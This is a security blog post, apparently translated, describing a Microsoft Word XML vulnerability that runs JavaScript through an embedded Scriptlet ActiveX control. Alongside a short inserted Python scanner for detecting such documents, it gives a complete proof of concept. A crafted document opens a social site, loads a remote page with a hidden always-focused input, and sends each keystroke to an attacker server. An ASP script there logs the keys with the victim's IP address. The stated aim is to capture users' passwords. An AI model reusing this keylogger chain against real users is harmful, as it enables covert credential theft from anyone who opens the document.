Author: cosine
Source: 0x37 Security
Microsoft Word JavaScript execution. Original: http://marc.info/?l=bugtraq&m=121121432823704&w=2, discussed in the hi group. We can draw some conclusions:
1. Because the ActiveX inline data stream feature is disabled once the Q313675 security patch is installed, it is not feasible to execute malicious code simply by creating an ActiveX object from JS. The following code:
<html>
<!-- Scriptlet control pointed at a javascript: URL; the &lt; is decoded before document.write runs -->
<OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"><param name="url" value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js></script>')"></OBJECT>
</html>
loads the remote doc.js, but what that script can do is limited. Popping up a dialog box or opening a new window still works, though.
2. The actual hole is in XML documents. When HTML constructed as above is opened in Word and saved as XML, the OBJECT is serialized into a <w:ocx w:data="..."/> element, and that is where the problem occurs. Files with the extensions .doc, .rtf and .xml are opened by Word by default, and Word then acts as the interpreter: the data inside <w:ocx w:data="..."/> is parsed and executed, which triggers the JS.
3. AE24FDAE-03C6-11D1-8B76-0080C744F389 is the classid of mshtml.dll. Pinning down the root cause of the vulnerability and fixing it is still worthwhile.
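As an added example that is not part of the original post, the following Python scanner shows how a defender could act on conclusion 2: parse a Word 2003 XML document, enumerate every <w:ocx> element and inspect its w:data attribute for the Scriptlet classid, a javascript: URL or other script indicators. The page does not document how Word encodes w:data, so treating the value as either plain text or as a hex string (with an optional DATA: prefix, decoded both as Latin-1 and UTF-16LE) is an assumption; the WordprocessingML namespace is taken from the Word 2003 schema, and the sample documents, including the hex/UTF-16LE one, are constructed here and are not Word output.

```python
import re
import xml.etree.ElementTree as ET
from html import escape

# Word 2003 WordprocessingML namespace (assumption: matches what Word 2003 writes).
WORDML_NS = "http://schemas.microsoft.com/office/word/2003/wordml"
# The classid the post attributes to mshtml.dll's Scriptlet control.
SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"

# Indicators worth flagging inside serialized control data.
INDICATORS = [
    ("scriptlet-clsid", re.compile(re.escape(SCRIPTLET_CLSID), re.I)),
    ("javascript-url", re.compile(r"javascript\s*:", re.I)),
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("window-open", re.compile(r"\bopen\s*\(", re.I)),
]


def decode_views(data):
    """Return (view_name, text) candidates for a w:data value.

    Assumption: the page does not say how Word encodes w:data, so we look at the
    raw attribute text and, when the value (after an optional 'DATA:' prefix) is
    pure hex, at the decoded bytes as Latin-1 and as UTF-16LE.
    """
    views = [("raw", data)]
    body = data.split(":", 1)[1] if data.upper().startswith("DATA:") else data
    body = re.sub(r"\s+", "", body)
    if body and len(body) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", body):
        raw = bytes.fromhex(body)
        views.append(("hex/latin-1", raw.decode("latin-1")))
        views.append(("hex/utf-16le", raw.decode("utf-16le", errors="ignore")))
    return views


def scan_wordml(xml_text):
    """Return findings as (ocx_index, view_name, indicator_name) tuples."""
    root = ET.fromstring(xml_text)
    findings = []
    for idx, ocx in enumerate(root.iter(f"{{{WORDML_NS}}}ocx")):
        data = ocx.get(f"{{{WORDML_NS}}}data", "")
        for view, text in decode_views(data):
            for name, pat in INDICATORS:
                if pat.search(text):
                    findings.append((idx, view, name))
    return findings


# --- constructed samples (not real Word output) ---------------------------
POC_CONTROL = ('<OBJECT classid="clsid:' + SCRIPTLET_CLSID + '">'
               '<param name="url" value="javascript:x=open(\'http://www.xiaonei.com/\')">'
               '</OBJECT>')


def make_sample(data_value=None):
    """Build a minimal Word 2003 XML document; data_value goes into w:ocx/@w:data."""
    ocx = ""
    if data_value is not None:
        ocx = '<w:pict><w:ocx w:data="' + escape(data_value, quote=True) + '"/></w:pict>'
    return ('<w:wordDocument xmlns:w="' + WORDML_NS + '">'
            '<w:body><w:p><w:r><w:t>HI</w:t>' + ocx + '</w:r></w:p></w:body>'
            '</w:wordDocument>')


BENIGN_DOC = make_sample()                                   # no control at all
RAW_DOC = make_sample(POC_CONTROL)                           # control text stored verbatim
HEX_DOC = make_sample("DATA:" + POC_CONTROL.encode("utf-16le").hex())  # hex-encoded UTF-16LE

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("raw", RAW_DOC), ("hex", HEX_DOC)):
        print(label, scan_wordml(doc))
```

The scanner deliberately reports which decoded view produced each hit, so a false positive from the raw hex text (which cannot contain a hyphenated classid or a colon) is easy to tell apart from a real match in the decoded control data.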
Since the JS capability is limited, we have to make the most of it, as discussed in http://www.0x37.com/post/15.html. The following PoC works like this: when the user opens our crafted Word document doc.doc, it pops up the Xiaonei home page, http://www.xiaonei.com (picked for the experiment purely out of my own habit ......). We can then record the user's keystrokes on that page :). With luck the password is captured directly (if other users are like me, they type the password straight into the Xiaonei page and press Enter. Force of habit ......).
The doc.html code is as follows:
<html>
<!-- Opens Xiaonei in a new window, then every 3 s points its first frame at the remote docshell.html;
     the object with a custom toString is what ends up assigned to location -->
<OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"><param name="url" value="javascript:x=open('http://www.xiaonei.com/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.0x37.com/Project/poc/docshell.html';}};}catch(e){}},3000);void(1);"></OBJECT>
HI
</html>
Follow http://marc.info/?l=bugtraq&m=123791432823704&w=2 to turn this into the generated doc.doc file (this is the evil document; rename it so that it opens without fuss).
The remote docshell.html code is as follows:
<html>
<body bgcolor="#333333">
<div id="o"></div>
<!-- zero-size text box: it is kept focused so that every keystroke lands here -->
<input type="text" id="x" style="width:0;height:0">
<script>
// Pick whichever XMLHttpRequest implementation the host browser offers.
var _x = false;
if (window.XMLHttpRequest) {
    _x = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    _x = new ActiveXObject("Msxml2.XMLHTTP");
    if (!_x) { _x = new ActiveXObject("Microsoft.XMLHTTP"); }
}
// Send each key to docshell.asp as it is pressed.
document.onkeydown = function (e) {
    if (!e) e = window.event;
    try {
        tmp = String.fromCharCode(e.which | e.keyCode);
        _3or7("GET", "http://www.0x37.com/Project/poc/docshell.asp?tmp=" + tmp, null);
    } catch (ex) {}
}
// Synchronous request helper.
function _3or7(_m, _s, _) {
    _x.open(_m, _s, false);
    _x.send(_);
    return _x.responseText;
}
// Grab focus every 100 ms so that whatever the user types goes into the hidden input.
setInterval(function () { try { document.getElementById('x').focus(); } catch (e) {} }, 100);
focus();
</script>
</body>
</html>
The remote docshell.asp code is as follows:
<%
' Record the client address, honouring a proxy header if one is present.
ip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If ip = "" Then
    ip = Request.ServerVariables("REMOTE_ADDR")
End If
tmp = Request.QueryString("tmp")
Response.Write(tmp)
' Append "ip>key" to docshell.txt (mode 8 = ForAppending, create the file if missing).
filename = "docshell.txt"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(Server.MapPath(filename), 8, True)
file.Write(ip & ">" & tmp & Chr(13))
file.Close
Set file = Nothing
Set fso = Nothing
%>
The recorded result can then be seen at http://www.0x37.com/Project/poc/docshell.txt :). Complete files: http://www.0x37.com/Project/poc/wordjs.rar. This keylogger is still flawed, though. I wanted to combine it with the method from http://www.0x37.com/post/15.html to construct something more evil, but it did not go smoothly ...... I will come back to it later :). For now, let's wait for more information about the vulnerability.